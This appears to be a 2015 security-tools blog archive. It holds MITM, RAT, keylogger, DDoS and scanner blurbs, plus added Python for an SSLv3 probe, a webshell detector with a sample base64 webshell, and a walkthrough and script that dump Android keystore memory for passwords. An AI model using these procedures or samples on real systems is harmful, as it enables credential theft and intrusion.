Dec 11, 2015

Howto: install and use bettercap in Kali 2.0

1. Install Ruby-Dev
# apt-get install ruby-dev libpcap-dev

2. Download the bettercap source code
# git clone

3. Install bettercap
# cd bettercap
# gem build bettercap.gemspec
# gem install bettercap*.gem

4. Start sniffing traffic and the MITM
# bettercap -X -L -I eth0
-X => enable the sniffer
-L => parse packets coming from/to the address of this computer
-I => network interface

5. Download Proxy module
#  git clone

6. Use bettercap with BeEF
# bettercap -X -L -I eth0 --proxy-module bettercap-proxy-modules/beefbox.rb

Nov 23, 2015

Tools: Stream Detector - Alternate Data Streams (ADS) Detector

NoVirusThanks Stream Detector is a useful utility which finds all hidden Alternate Data Streams (ADS) on NTFS drives. After finding the alternate data streams, you can extract these streams, delete the file, delete unwanted streams, or export the list of found streams to a log file. This program can also list multiple hidden streams on one file and properly detects alternate data streams attached to a folder/directory.


Nov 18, 2015

Tools: MassBleed - MassBleed SSL Vulnerability Scanner

USAGE: sh [CIDR|IP] [single|port|subnet] [port] [proxy]
ABOUT: This script has four main functions with the ability to proxy all connections:
  1. To mass scan any CIDR range for OpenSSL vulnerabilities via port 443/tcp (https) (example: sh
  2. To scan any CIDR range for OpenSSL vulnerabilities via any custom port specified (example: sh port 8443)
  3. To individually scan every port (1-10000) on a single system for vulnerable versions of OpenSSL (example: sh single)
  4. To scan every open port on every host in a single class C subnet for OpenSSL vulnerabilities (example: sh 192.168.0. subnet)
PROXY: A proxy option has been added to scan via proxychains. You'll need to configure /etc/proxychains.conf for this to work.
PROXY USAGE EXAMPLES: (example: sh 0 0 proxy) (example: sh port 8443 proxy) (example: sh single 0 proxy) (example: sh 192.168.0. subnet 0 proxy)
  1. OpenSSL HeartBleed Vulnerability (CVE-2014-0160)
  2. OpenSSL CCS (MITM) Vulnerability (CVE-2014-0224)
  3. Poodle SSLv3 vulnerability (CVE-2014-3566)
REQUIREMENTS (the script asks for each of these before scanning): the Heartbleed PoC, the OpenSSL CCS script, unicornscan, nmap and sslscan.
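MassBleed delegates the actual checks to sslscan, nmap and the PoC scripts it lists. As an added example that is not part of MassBleed or of this page, the Python below shows what the POODLE (CVE-2014-3566) portion of such a scan reduces to at the protocol level: send an SSLv3-only ClientHello and classify the first record that comes back. A ServerHello carrying version 3.0 means the server still negotiates SSLv3 and is exposed; a protocol_version alert means it refuses. The cipher list, the default target and the sample reply bytes are assumptions constructed for the example; it does not test Heartbleed or CCS.

```python
import os
import socket
import struct
import sys

RECORD_HANDSHAKE = 0x16
RECORD_ALERT = 0x15
HS_CLIENT_HELLO = 0x01
HS_SERVER_HELLO = 0x02

# Cipher suites an SSLv3-capable server of that era typically still offers (assumed list):
# AES128-SHA, AES256-SHA, DES-CBC3-SHA, RC4-SHA, RC4-MD5.
SSL3_CIPHERS = (0x002F, 0x0035, 0x000A, 0x0005, 0x0004)


def build_client_hello(major=3, minor=0, ciphers=SSL3_CIPHERS):
    """Build a minimal ClientHello record. (3, 0) is SSLv3; (3, 1) would be TLS 1.0."""
    body = struct.pack("!BB", major, minor)          # client_version
    body += os.urandom(32)                           # client_random
    body += b"\x00"                                  # empty session_id
    body += struct.pack("!H", 2 * len(ciphers))      # cipher_suites length in bytes
    body += b"".join(struct.pack("!H", c) for c in ciphers)
    body += b"\x01\x00"                              # compression_methods: null only
    # Handshake header: type (1 byte) + 24-bit length; SSLv3 has no extensions.
    handshake = struct.pack("!B", HS_CLIENT_HELLO) + struct.pack("!I", len(body))[1:] + body
    # Record header: content type, version, 16-bit length.
    return struct.pack("!BBBH", RECORD_HANDSHAKE, major, minor, len(handshake)) + handshake


def classify_response(data):
    """Interpret the first record a server returns for our SSLv3 ClientHello.

    'sslv3'            -> server negotiated SSLv3, i.e. POODLE-exposed
    'alert'            -> server refused (typically fatal protocol_version)
    'other-version:M.m'-> server answered with a different version
    'unknown'          -> too short / not a handshake or alert record
    """
    if len(data) < 5:
        return "unknown"
    ctype, major, minor, length = struct.unpack("!BBBH", data[:5])
    if ctype == RECORD_ALERT:
        return "alert"
    if ctype == RECORD_HANDSHAKE and len(data) >= 11 and data[5] == HS_SERVER_HELLO:
        srv_major, srv_minor = data[9], data[10]     # server_version field of ServerHello
        if (srv_major, srv_minor) == (3, 0):
            return "sslv3"
        return "other-version:%d.%d" % (srv_major, srv_minor)
    return "unknown"


def probe_sslv3(host, port=443, timeout=5.0):
    """Connect, send the SSLv3 ClientHello and classify the first reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_client_hello())
        try:
            return classify_response(sock.recv(4096))
        except socket.timeout:
            return "unknown"   # some servers silently drop unsupported versions


# Constructed sample replies used to exercise classify_response() offline.
# ServerHello record: version 3.0, 42-byte handshake, server_version 3.0, zero random,
# empty session id, cipher AES128-SHA, null compression.
SAMPLE_SSLV3_SERVER_HELLO = (
    b"\x16\x03\x00\x00\x2a" + b"\x02\x00\x00\x26" + b"\x03\x00" + b"\x00" * 32
    + b"\x00" + b"\x00\x2f" + b"\x00"
)
# Alert record: level fatal (2), description protocol_version (70): a patched server's refusal.
SAMPLE_PROTOCOL_VERSION_ALERT = b"\x15\x03\x01\x00\x02\x02\x46"


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "example.com"   # assumed default target
    print(target, probe_sslv3(target))
```

Run it as `python probe.py host` against systems you are authorised to test; a result of `sslv3` is the condition MassBleed's POODLE check reports. Servers that drop the connection without an alert come back as `unknown`, which is why timeouts are treated as a result rather than an error.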


Nov 16, 2015

Tools: Windows Remote Access Trojan (RAT)

Windows Remote Access Trojan (RAT) using .NET Sockets
Client-server binaries and source-code for controlling a remote machine behind a NAT with a command-line shell in Windows. Although the core provides support for communication with multiple RATs, the command-line interface used has limited capabilities distinguishing each one.
The RAT process executable does not hide itself from taskbar or task manager as it was developed for educational purposes only. Please do not use for any malicious purposes.
Contains the source code and the two binaries packaged using ILMerge.

  1. Start the server in a command-line acting as the RAT (Binaries\rat.exe) -> rat ip=[controller-ip-address] port=[controller-port-default-is-9999]
  2. Start the client in a command-line acting as the controller (Binaries\controller.exe) -> controller ip=[listen-ip-address] port=[listen-port-default-is-9999]
  3. Issue commands from the controller.exe interface

Tools: 0d1n - Web security tool to make fuzzing at HTTP inputs, made in C with libCurl

0d1n is a tool for automating customised attacks against web applications:
* brute force passwords in authentication forms
* directory disclosure (brute force with a path list and record the HTTP status codes)
* run a payload list against an input to find SQL Injection and XSS vulnerabilities
* and more


Tools: Bonesi - Simulate a HTTP GET BotNet DDoS Attack

How does TCP spoofing work?
BoNeSi sniffs for TCP packets on the network interface and responds to all packets in order to establish TCP connections. For this feature it is necessary that all traffic from the target webserver is routed back to the host running BoNeSi.
HTTP flooding attacks cannot be simulated over the internet, because the answers from the webserver must be routed back to the host running BoNeSi.

It can be used to test firewall systems, routing hardware, DDoS Mitigation Systems or webservers directly.

Tools: Sn1per – Automated Pentest Recon Scanner

Sn1per is an automated open source scanner that you can use during penetration testing. The tool chains a collection of pentest utilities such as theHarvester, nmap and brute forcers against your target. Some of its features are:
  • Automatically collects basic recon (ie. whois, ping, DNS, etc.)
  • Automatically launches Google hacking queries against a target domain
  • Automatically enumerates open ports
  • Automatically brute forces sub-domains and DNS info
  • Automatically runs targeted nmap scripts against open ports
  • Automatically scans all web applications for common vulnerabilities
  • Automatically brute forces all open services

Tools: Joomlavs - A black box, Ruby powered, Joomla vulnerability scanner

JoomlaVS is a Ruby application that helps automate assessing how vulnerable a Joomla installation is to exploitation. It supports basic fingerprinting and can scan for vulnerabilities in components, modules and templates as well as vulnerabilities that exist within Joomla itself.


Nov 7, 2015

Tools: SpiderFoot – Open Source Intelligence Automation Tool (OSINT)


There are three main areas where SpiderFoot can be useful:
  • If you are a pen-tester, SpiderFoot will automate the reconnaissance stage of the test, giving you a rich set of data to help you pin-point areas of focus for the test.
  • Understand what your network/organisation is openly exposing to the outside world. Such information in the wrong hands could be a significant risk.
  • SpiderFoot can also be used to gather threat intelligence about suspected malicious IPs you might be seeing in your logs or have obtained via threat intelligence data feeds.


SpiderFoot has plenty of features, including the following:
  • Utilises a lot of different data sources; over 40 so far and counting, including SHODAN, RIPE, Whois, PasteBin, Google, SANS and more.
  • Designed for maximum data extraction; every piece of data is passed on to modules that may be interested, so that they can extract valuable information. No piece of discovered data is saved from analysis.
  • Runs on Linux and Windows. And fully open-source so you can fork it on GitHub and do whatever you want with it.
  • Visualisations. Built-in JavaScript-based visualisations or export to GEXF/CSV for use in other tools, like Gephi for instance.
  • Web-based UI. No cumbersome CLI or Java to mess with. Easy to use, easy to navigate.
  • Highly configurable. Almost every module is configurable so you can define the level of intrusiveness and functionality.
  • Modular. Each major piece of functionality is a module, written in Python. Feel free to write your own and submit them to be incorporated!
  • SQLite back-end. All scan results are stored in a local SQLite database, so you can play with your data to your heart’s content.
  • Simultaneous scans. Each footprint scan runs as its own thread, so you can perform footprinting of many different targets simultaneously.

Tools: Bluto - Recon, Subdomain Bruting, Zone Transfers

DNS recon | Brute forcer | DNS Zone Transfer | Email Enumeration
Author: Darryl Lane | Twitter: @darryllane101
The target domain is queried for MX and NS records. Sub-domains are passively gathered via NetCraft. The target domain's NS records are each queried for potential zone transfers. If none of them gives up their spinach, Bluto will brute force subdomains using parallel sub-processing on the top 20000 of 'The Alexa Top 1 Million subdomains'. NetCraft results are presented individually and are then compared to the brute force results; any duplicates are removed and particularly interesting results are highlighted.
Bluto now does email address enumeration based on the target domain, currently using the Bing and Google search engines. It uses a random User-Agent on each request and does a country lookup to select the fastest Google server relative to your egress address. Each request closes the connection in an attempt to further avoid captchas; however, excessive lookups will still result in captchas (Bluto will warn you if any are identified).


Nov 2, 2015

Tools: ARDT - Akamai Reflective DDoS Tool

Attack the origin host behind the Akamai Edge hosts and bypass the DDoS protection offered by Akamai services.


Tools: windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems

Windows-privesc-check is standalone executable that runs on Windows systems. It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases).
It is written in python and converted to an executable using pyinstaller so it can be easily uploaded and run (as opposed to unzipping python + other dependencies). It can run either as a normal user or as Administrator (obviously it does a better job when running as Administrator because it can read more files).
The latest version of the code is in the master branch.

Use Cases

Below is a high level description of common use cases. See also the Quick Start & Usage page.

Find Privesc Vectors (as Administrator)

When run with admin rights, windows-privesc-check has full read access to all securable objects. This allows it to perform audits for escalation vectors such as:
  • Reconfiguring Windows Services
  • Replacing Service executables if they have weak file permissions
  • Replacing poorly protected .exe or .dll files in %ProgramFiles%
  • Trojaning the %PATH%
  • Maliciously modifying the registry (e.g. RunOnce)
  • Modifying programs on FAT file systems
  • Tampering with running processes
A great many of the privilege escalation vectors checked are simply checks for weak security descriptors on Windows securable objects.
A report is generated in HTML, TXT and XML format.

Find Privesc Vectors (as a Low-Privileged User)

An important design goal is that windows-privesc-check can perform as many checks as possible (above) without admin rights. This will make the tool useful to pentesters as well as auditors.
Clearly, low-privileged users are unable to see certain parts of the registry and file system. The tool is therefore inherently less able to identify security weaknesses when run as a low-privileged user.
As above, a report is generated in HTML, TXT and XML format.

Dump Raw Auditing Data

Windows-privesc-check can simply dump the raw data that it would normally use to identify security weaknesses. This data can then be analysed some other way, or simply stored as a snapshot of system security at the time of the audit.
Both human-readable (text) and machine readable (tab delimited) formats are supported.
Examples of data users are able to dump:


Oct 23, 2015

Howto: Install bkhive in Kali 2.0

1. Download bkhive from the Debian repository
# wget "" -O bkhive-1.1.1.tar.gz

2. Extract
# tar xzvf bkhive-1.1.1.tar.gz

3. Install libssl-dev
# apt-get install libssl-dev

4. Build and install it (from inside the extracted bkhive-1.1.1 directory)
# make
# make install

Howto: Install latest Recon-ng in Kali 2.0

1. Purge old recon-ng
# apt-get purge recon-ng

2. Get the new one from source
# git clone

Oct 20, 2015

Tools: Gping - Ping, but with a graph

Ping, but with a graph


Tools: XVWA - Xtreme Vulnerable Web Application

XVWA is a badly coded web application written in PHP/MySQL that helps security enthusiasts to learn application security.

XVWA is designed to demonstrate the following security issues.
  • SQL Injection – Error Based
  • SQL Injection – Blind
  • OS Command Injection
  • XPATH Injection
  • Unrestricted File Upload
  • Reflected Cross Site Scripting
  • Stored Cross Site Scripting
  • DOM Based Cross Site Scripting
  • Server Side Request Forgery (Cross Site Port Attacks)
  • File Inclusion
  • Session Issues
  • Insecure Direct Object Reference
  • Missing Functional Level Access Control
  • Cross Site Request Forgery (CSRF)
  • Cryptography
  • Unvalidated Redirect & Forwards
  • Server Side Template Injection


Tools: LogScape - Centralize Log and Log Searcher

Search, visualize and analyze log files and operational data


Sep 30, 2015

Tools: Windows Spy Keylogger

Windows Spy Keylogger is free software to covertly monitor all activities on your computer.
  • Free tool to monitor keystrokes in a stealthy manner
  • Monitor both 32-bit & 64-bit applications
  • Automatically run at Startup
  • No need for administrator privileges
  • Settings dialog to change various options
  • Stores keyboard activities silently to a log file
  • Very easy to use with just a click of button
  • Displays current status of key logger at any time
  • Includes Installer for local installation & un-installation
How to Use?
'Windows Spy Keylogger' is a very easy to use tool with a simple GUI.
Here are the simple steps,
  • Run 'Windows Spy Keylogger' on your system
  • It will show you the current status of Keylogger as seen in the screenshots below.
  • Now you can just click on button below to Start or Stop Keylogger
  • That's all :)

Sep 25, 2015

Tools: ARDT - Akamai Reflective DDoS Tool

Akamai Reflective DDoS Tool - Attack the origin host behind the Akamai Edge hosts and DDoS protection offered by Akamai services.


Tools: Tango - Set of scripts and Splunk apps for Honeypot

Tango is a set of scripts and Splunk apps which help organizations and users quickly and easily deploy honeypots and then view the data and analysis of the attacker sessions. There are two scripts provided which facilitate the installation of the honeypots and/or Splunk Universal Forwarder. One of the scripts will install the Splunk Universal Forwarder and install the necessary input and output configuration files. The other script will install the Splunk Universal Forwarder along with the Cowrie honeypot required for the Tango Honeypot Intelligence app to work.


Sep 24, 2015

Tools: Powercat - A PowerShell version of netcat.

PowerCat is a PowerShell module: you need to load the function before you can execute it. One of the loading commands can be put into your PowerShell profile so that powercat is loaded automatically when PowerShell starts.


Tools: php-malware-finder - Detect potentially malicious PHP files

PHP-malware-finder does its very best to detect obfuscated/dodgy code as well as files using PHP functions often used in malware/webshells.
The following list of encoders/obfuscators/webshells is also detected:
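php-malware-finder ships its detection as YARA rules. The Python below is an added example, not the project's code or rules, showing the shape of such a scanner: a weighted set of indicators for the two things the description names (obfuscated code and webshell-style function use), run over every PHP file under a webroot. The indicator set, weights, threshold and the two sample files are constructed for the example; the webshell sample is a synthetic one-liner, not malware from the wild.

```python
import os
import re

# Constructed indicator set (assumed, not php-malware-finder's YARA rules): (name, regex, weight).
INDICATORS = [
    # eval() fed directly by a decoder: the classic encoded one-line shell
    ("eval_of_decoder", re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13|strrev)\s*\(", re.I), 3),
    # command execution driven straight from request data
    ("exec_of_request", re.compile(
        r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I), 3),
    # variable-function call on request data, e.g. $f($_POST['c']) after $f = "sys"."tem"
    ("variable_function_of_request", re.compile(r"\$\w+\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b"), 3),
    # preg_replace with the /e modifier (an eval in disguise on PHP 5.x)
    ("preg_replace_e", re.compile(r"preg_replace\s*\(\s*['\"]/[^'\"]*/[a-z]*e[a-z]*['\"]", re.I), 2),
    # long base64 literal: payloads hide here
    ("long_base64_literal", re.compile(r"['\"][A-Za-z0-9+/]{120,}={0,2}['\"]"), 1),
    # long run of \xNN escapes used to hide function names
    ("hex_escaped_run", re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"), 1),
    # string concatenation that assembles a dangerous function name
    ("split_exec_name", re.compile(
        r"['\"](?:sys|ex|she|pass|asser)['\"]\s*\.\s*['\"](?:tem|ec|ll_exec|thru|t)['\"]", re.I), 2),
]

SUSPICION_THRESHOLD = 3


def scan_php(source):
    """Return {indicator_name: hit_count} for one PHP source string."""
    hits = {}
    for name, pattern, _weight in INDICATORS:
        count = len(pattern.findall(source))
        if count:
            hits[name] = count
    return hits


def score(hits):
    """Weighted sum of hits; several weak indicators add up to one strong one."""
    weights = {name: w for name, _p, w in INDICATORS}
    return sum(weights[name] * count for name, count in hits.items())


def is_suspicious(source, threshold=SUSPICION_THRESHOLD):
    return score(scan_php(source)) >= threshold


def scan_tree(root):
    """Walk a webroot; return [(path, score, hits)] for every PHP file over the threshold."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.join(dirpath, fname)
            with open(path, "rb") as fh:
                src = fh.read().decode("utf-8", "replace")
            hits = scan_php(src)
            s = score(hits)
            if s >= SUSPICION_THRESHOLD:
                findings.append((path, s, hits))
    return sorted(findings, key=lambda f: -f[1])


# Constructed samples (not real files from any site).
BENIGN_SAMPLE = '<?php $q = $_GET["q"] ?? ""; echo htmlspecialchars($q, ENT_QUOTES); ?>'
WEBSHELL_SAMPLE = (
    '<?php $f = "sys" . "tem"; $f($_POST["c"]);\n'
    'eval(base64_decode("aWYoaXNzZXQoJF9QT1NUWyJjIl0pKXtzeXN0ZW0oJF9QT1NUWyJjIl0pO30=")); ?>'
)

if __name__ == "__main__":
    import sys
    for path, s, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print("%3d  %s  %s" % (s, path, ",".join(sorted(hits))))
```

Regex indicators like these are cheap and catch the bulk of commodity shells, but they are trivially evaded by splitting strings further or by `chr()`-building names, which is why php-malware-finder also carries whole-file signatures for known webshells and why a high score should be treated as a lead to review, not a verdict.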


Tools: Pupy - opensource RAT (Remote Administration Tool) written in Python

Pupy is an opensource RAT (Remote Administration Tool) written in Python. Pupy uses reflective dll injection and leaves no traces on disk.

Features :

  • On Windows, the Pupy payload is compiled as a reflective DLL and the whole Python interpreter is loaded from memory. Pupy does not touch the disk :)
  • Pupy can reflectively migrate into other processes
  • Pupy can remotely import, from memory, pure Python packages (.py, .pyc) and compiled Python C extensions (.pyd). The imported Python modules do not touch the disk. (.pyd memory import currently works on Windows only; .so memory import is not implemented.)
  • Modules are quite simple to write and Pupy is easily extensible.
  • Pupy uses rpyc, so a module can directly access Python objects on the remote client
    • remote objects can also be accessed interactively from the Pupy shell, and even auto-completion of remote attributes works!
  • The communication channel currently works as an SSL reverse connection; a bind payload will be implemented in the future
  • All the non-interactive modules can be dispatched to multiple hosts in one command
  • Multi-platform (tested on Windows 7, Windows XP, Kali Linux, Ubuntu)
  • Modules can be executed as background jobs
  • Commands and scripts running on remote hosts are interruptible
  • Auto-completion and nice coloured output :-)
  • Command aliases can be defined in the config

Sep 21, 2015

Tools: scanmem - memory scanner for Linux

scanmem is a debugging utility designed to isolate the address of an arbitrary variable in an executing process. scanmem simply needs to be told the pid of the process, and the value of the variable at several different times.
After several scans of the process, scanmem isolates the position of the variable and allows you to modify its value.
GameConqueror is a GUI front-end for scanmem that additionally provides a flexible search syntax, locking of multiple memory locations and a memory editor.
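The narrowing that scanmem performs is simple enough to show in full. The Python below is an added example, not scanmem's code: it takes successive snapshots of a memory region together with the value the variable had at each moment, keeps only the offsets whose bytes still decode to that value, and finally writes a new value at the surviving address. The 64-byte region, its base address and the decoy variable are constructed; against a live process the snapshots would be read from, and the patch written to, /proc/<pid>/mem.

```python
import struct

FMT_INT32 = "<i"   # little-endian 32-bit signed int, the width scanmem tries first


def initial_scan(snapshot, value, base=0, fmt=FMT_INT32):
    """First pass: every offset whose bytes decode to `value` is a candidate.

    Like scanmem, this checks every byte offset, not just aligned ones, so
    unaligned false positives are possible and are removed by later passes.
    """
    size = struct.calcsize(fmt)
    return [base + off for off in range(0, len(snapshot) - size + 1)
            if struct.unpack_from(fmt, snapshot, off)[0] == value]


def narrow(candidates, snapshot, value, base=0, fmt=FMT_INT32):
    """Subsequent pass: keep only candidates that now hold the new value."""
    return [addr for addr in candidates
            if struct.unpack_from(fmt, snapshot, addr - base)[0] == value]


def locate(snapshots_and_values, base=0, fmt=FMT_INT32):
    """Run the whole narrowing sequence over (snapshot, value) pairs taken at different times."""
    (first, value), rest = snapshots_and_values[0], snapshots_and_values[1:]
    candidates = initial_scan(first, value, base, fmt)
    for snapshot, value in rest:
        candidates = narrow(candidates, snapshot, value, base, fmt)
    return candidates


def patched(snapshot, addr, new_value, base=0, fmt=FMT_INT32):
    """Return a copy of the region with `new_value` written at `addr` (scanmem's `set`).

    For a real target the same bytes would be written to /proc/<pid>/mem at `addr`.
    """
    buf = bytearray(snapshot)
    struct.pack_into(fmt, buf, addr - base, new_value)
    return bytes(buf)


# --- constructed demo: a 64-byte region mapped at 0x1000 --------------------------
BASE = 0x1000


def make_region(health, decoy):
    # `decoy` is an unrelated variable that happens to equal `health` at the first scan.
    region = bytearray(64)
    struct.pack_into(FMT_INT32, region, 8, decoy)
    struct.pack_into(FMT_INT32, region, 20, health)
    struct.pack_into(FMT_INT32, region, 40, 7)
    return bytes(region)


T0 = make_region(health=100, decoy=100)   # two offsets read 100: ambiguous
T1 = make_region(health=87, decoy=100)    # the variable changed, the decoy did not

if __name__ == "__main__":
    found = locate([(T0, 100), (T1, 87)], base=BASE)
    print("candidates after two scans:", [hex(a) for a in found])
    fixed = patched(T1, found[0], 999, base=BASE)
    print("value now at %#x:" % found[0], struct.unpack_from(FMT_INT32, fixed, found[0] - BASE)[0])
```

The first scan alone is rarely decisive (here two offsets hold 100); it is the change between scans that disambiguates, which is why scanmem asks for the value "at several different times".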


Sep 17, 2015

Tools: Android Vulnerability Test Suite

Android Vulnerability Test Suite - In the spirit of open data collection, and with the help of the community, let's take a pulse on the state of Android security. NowSecure presents an on-device app to test for recent device vulnerabilities.


Sep 9, 2015

Howto: Extract sensitive plaintext data from Android memory

1. Upload the file
$ adb push gdbserver /sdcard

2. Enter a shell and become root
$ adb shell
$ su

3. Remount /system as read/write
$ mount -o rw,remount /system

4. Copy file to /system/xbin (or /system/bin)
$ cp /sdcard/gdbserver /system/xbin

5. Change permissions to ensure that it is executable
$ chmod 555 /system/xbin/gdbserver

6. Clean up
$ mount -o ro,remount /system
$ rm /sdcard/gdbserver

7. Download and compile gdb
$ wget
$ bunzip2 gdb-7.7.tar.bz2
$ tar xf gdb-7.7.tar
$ cd gdb-7.7/
$ ./configure --target=arm-linux-gnueabi
$ make

8. Find the keystore pid
$ ps | grep key
$ cd /proc/228

9. Find the heap
The mapping list of the process (/proc/228/maps) shows the code of the process itself and its libraries, followed by the regions that hold the process's live data:
- heap   - memory assigned by the VM or by the kernel for data storage
- stack  - memory used during function calls etc.
In this case the heap runs from 0xb7712000 (start of heap) to 0xb771f000 (end of heap).

10. Start gdbserver on the process listening on a port on the device
$ gdbserver --attach :1234 228
1234 => any free port on the device
228 => the PID found in step 8

11. Use adb to forward the port on the device to a local port
$ adb forward tcp:1234 tcp:1234

This now lets us talk to port 1234/tcp on the device by connecting to 1234/tcp on the host.

12. Use a third party program to forward the local port to the device where you will be running gdb
> Use program "Port Forwarding for Windows” to forward from my native OS to the virtual machine I run gdb on

13. Connect via gdb
$ ./gdb
$ gdb> target remote

14. Dump the memory
$ gdb> dump memory /tmp/heapout 0xb7712000 0xb771f000

15. Look for some strings that can be user, password
$ strings /tmp/heapout | more
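Once you have root on the device, steps 9, 14 and 15 can also be done without gdb by reading /proc/<pid>/maps and /proc/<pid>/mem directly. The Python below is an added example, not part of the original howto: it parses a maps listing to locate [heap] and every other writable anonymous region (on Android the Dalvik heap usually lives in ashmem mappings rather than in [heap], so dumping only [heap] misses most of the app's objects), reads each range and pulls out printable strings the way strings(1) does. The maps excerpt embedded in it is constructed; only the [heap] range is the one quoted in step 9. It assumes a Python interpreter with read access to /proc/<pid>/mem, i.e. root on the device or a Linux host running the target in an emulator.

```python
import re
import sys

# Constructed excerpt of /proc/<pid>/maps for the keystore process in the walkthrough.
# The [heap] line reproduces the range quoted in step 9; the other lines are made up.
SAMPLE_MAPS = """\
b6f2a000-b6f5c000 r-xp 00000000 b3:17 1234       /system/bin/keystore
b6f5c000-b6f5e000 r--p 00031000 b3:17 1234       /system/bin/keystore
b6f5e000-b6f5f000 rw-p 00033000 b3:17 1234       /system/bin/keystore
b6f5f000-b6f61000 rw-p 00000000 00:00 0
b7712000-b771f000 rw-p 00000000 00:00 0          [heap]
b7800000-b7900000 rw-p 00000000 00:00 0          /dev/ashmem/dalvik-heap (deleted)
be8e0000-be901000 rw-p 00000000 00:00 0          [stack]
"""

# start-end perms offset dev inode [pathname]
MAPS_LINE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S{4})\s+\S+\s+\S+\s+\S+\s*(.*)$")


def parse_maps(text):
    """Parse /proc/<pid>/maps text into (start, end, perms, name) tuples."""
    regions = []
    for line in text.splitlines():
        m = MAPS_LINE.match(line)
        if m:
            start, end, perms, name = m.groups()
            regions.append((int(start, 16), int(end, 16), perms, name.strip()))
    return regions


def find_region(regions, name):
    """Address range of the region called `name`, e.g. '[heap]' or '[stack]'."""
    for start, end, _perms, rname in regions:
        if rname == name:
            return start, end
    return None


def writable_anonymous(regions):
    """rw- regions that are not file-backed: [heap], anonymous, ashmem/dalvik heaps, [stack]."""
    return [(s, e, name) for s, e, perms, name in regions
            if perms.startswith("rw")
            and (name == "" or name.startswith("[") or "ashmem" in name)]


def read_region(pid, start, end):
    """Read raw bytes from /proc/<pid>/mem; the same bytes gdb's `dump memory` would write."""
    with open("/proc/%d/mem" % pid, "rb", buffering=0) as mem:
        mem.seek(start)
        return mem.read(end - start)


def printable_strings(data, min_len=4):
    """Like strings(1): runs of printable ASCII at least min_len bytes long."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def credential_like(strings, keywords=("user", "pass", "pin", "token", "secret")):
    """Cheap first filter for the 'user, password' hunt in step 15."""
    return [s for s in strings if any(k in s.lower() for k in keywords)]


if __name__ == "__main__":
    pid = int(sys.argv[1])
    with open("/proc/%d/maps" % pid) as fh:
        regions = parse_maps(fh.read())
    for start, end, name in writable_anonymous(regions):
        try:
            data = read_region(pid, start, end)
        except OSError as exc:          # e.g. an unreadable guard page
            print("skip %08x-%08x %s: %s" % (start, end, name, exc))
            continue
        for s in credential_like(printable_strings(data)):
            print("%08x %-24s %s" % (start, name or "(anon)", s))
```

Run as `python dumpmem.py 228` on the device (or the emulator host). Because the whole region is read at once, a large ashmem mapping can be tens of megabytes; read it in chunks if memory is tight.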

Tools: USBDeview v2.45 - View all installed/connected USB devices on your system

USBDeview is a small utility that lists all USB devices that are currently connected to your computer, as well as all USB devices that you previously used.
For each USB device, extended information is displayed: device name/description, device type, serial number (for mass storage devices), the date/time that the device was added, VendorID, ProductID, and more.
USBDeview also allows you to uninstall USB devices that you previously used, disconnect USB devices that are currently connected to your computer, and disable and enable USB devices.
You can also use USBDeview on a remote computer, as long as you log in to that computer as an admin user.

Using USBDeview

USBDeview doesn't require any installation process or additional DLL files. Just copy the executable file (USBDeview.exe) to any folder you like, and run it.
The main window of USBDeview displays all USB devices installed on your system. You can select one or more items, and then disconnect (unplug) them, uninstall them, or just save the information to a text/xml/html file.
USBDeview Columns Description
  • Device Name: Specifies the device name. For some devices this column may display a meaningless name, like "USB Device". If the device name is meaningless, look at the Description column instead.
  • Device Description: The description of the device.
  • Device Type: The device type, according to USB class code. For more information about USB classes: USB Class Codes.
  • Connected: Specifies whether the device is currently connected to your computer. If the device is connected, you can use the 'Disconnect Selected Devices' option (F9) to disconnect the device.
  • Safe To Unplug: Specifies whether it's safe to unplug the device from the USB plug without disconnecting it first. If the value of this column is false, and you want to unplug this device, you must first disconnect this device by using the 'Disconnect Selected Devices' option (F9) of USBDeview utility, or by using the 'Unplug or Eject Hardware' utility of Windows operating system.
  • Drive Letter: Specifies the drive letter of the USB device. This column is only relevant to USB flash memory devices and to USB CD/DVD drives. Be aware that USBDeview cannot detect drive letters of USB hard-disks.
  • Serial Number: Specifies the serial number of the device. This column is only relevant to mass storage devices (flash memory devices, CD/DVD drives, and USB hard-disks).
  • Created Date: Specifies the date/time that the device was installed. In most cases, this date/time value represents the time that you first plugged the device to the USB port. However, be aware that in some circumstances this value may be wrong. Also, On Windows 7, this value is initialized with the current date/time on every reboot.
  • Last Plug/Unplug Date: Specifies the last time that you plugged/unplugged the device. This date value is lost when you restart the computer.
  • VendorID/ProductID: Specifies the VendorID and ProductID of the device.
  • USB Class/Subclass/Protocol: Specifies the Class/Subclass/Protocol of the device according to USB specifications. For more information about USB classes: USB Class Codes.
  • Hub/Port: Specifies the hub number and port number that the device was plugged into. This value is empty for mass storage devices.
Notice: According to user reports, On some systems the 'Last Plug/Unplug Date' and the 'Created Date' values are initialized after reboot. This means that these columns may display the reboot time instead of the correct date/time.


Howto: use Metasploit in Kali2

1. Initialise the Metasploit database (first time only)
# systemctl start postgresql
# msfdb init
# msfconsole

2. Start msfdb + postgresql
# systemctl start postgresql
# msfdb start
# msfconsole

Tools: OWASP ZeroDay Cyber Research Shellcoder

OWASP ZeroDay Cyber Research Shellcoder [Generator] is open source software written in Python that generates customised shellcode for the listed operating systems. It runs on Linux under Python 2.7.x.


Usage of shellcodes

Shellcode is a small piece of assembly code used as the payload when exploiting software. Other uses are in malware, antivirus evasion, code obfuscation and so on.

Why use OWASP ZSC?

Compared with other shellcode generators such as the Metasploit tools, OWASP ZSC uses new encoders and methods that antivirus engines do not yet detect. Its encoders generate shellcode with random encodings, so thousands of different shellcodes that do the same job can be produced in a second: running the same command with a random encoder never yields the same code twice. Shellcode generation for more operating systems is planned for future versions.

Tools: Btproxy - Man in the Middle analysis tool for Bluetooth.


